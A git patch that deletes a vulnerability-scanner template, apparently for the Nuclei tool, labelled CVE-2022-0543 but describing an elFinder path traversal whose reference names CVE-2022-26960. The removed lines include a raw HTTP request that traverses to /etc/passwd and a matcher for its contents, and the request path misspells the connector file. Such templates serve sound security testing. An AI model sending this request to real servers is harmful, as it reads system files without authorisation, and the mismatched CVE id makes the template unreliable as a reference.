From 6735f99a543652f086c1b4b10e9c47439d8d3f22 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Thu, 30 Jun 2022 19:29:52 -0400
Subject: [PATCH] Delete CVE-2022-0543
---
cves/2022/CVE-2022-0543 | 25 -------------------------
1 file changed, 25 deletions(-)
delete mode 100644 cves/2022/CVE-2022-0543
diff --git a/cves/2022/CVE-2022-0543 b/cves/2022/CVE-2022-0543
deleted file mode 100644
index 015a33cf3d..0000000000
--- a/cves/2022/CVE-2022-0543
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2022-0543
-
-info:
- name: elFinder - Path Traversal
- author: pikpikcu
- severity: critical
- description: |
- Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
- reference:
- - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
- - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
- tags: cve,cve2022,lfi,elfinder
-
-requests:
- - raw:
- - |
- GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"